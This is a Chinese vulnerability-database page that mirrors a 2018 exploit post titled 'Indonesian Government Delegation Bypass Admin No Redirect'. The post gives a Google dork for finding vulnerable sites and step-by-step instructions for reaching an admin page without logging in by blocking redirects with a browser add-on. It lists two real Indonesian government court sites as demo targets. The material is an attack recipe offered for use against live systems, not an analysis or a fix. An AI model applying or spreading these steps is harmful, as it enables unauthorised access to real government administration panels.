Indonesian Government Delegation Bypass Admin No Redirect

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034893 漏洞类型
发布时间 2018-05-31 更新时间 2018-05-31
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018050308
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
***************************************************
# Exploit Title: Indonesian Government Delegation Bypass Admin No Redirect
# Google Dork: inurl:/formdelegasi.php
# Exploit: /administrator/view.php
# Date: 31/05/2018
# Author: 0N3R1D3R
# Team: Error Violence
# Tested on: Windows 10 x64
***************************************************
[+] Download and install NoRedirect Add-ons in firefox ( https://addons.mozilla.org/en-US/firefox/addon/noredirect/ )
[+] Search the dork in Google
[+] Open target
[+] Give ^ in NoRedirect Add-ons
[+] Exploit with /administrator/view.php
***************************************************
[+] Demo Site
[+] http://pn-liwa.go.id/delegasi/administrator/view.php
[+] http://pn-sukadana.go.id/delegasi/administrator/view.php
***************************************************
Thanks To Error Violence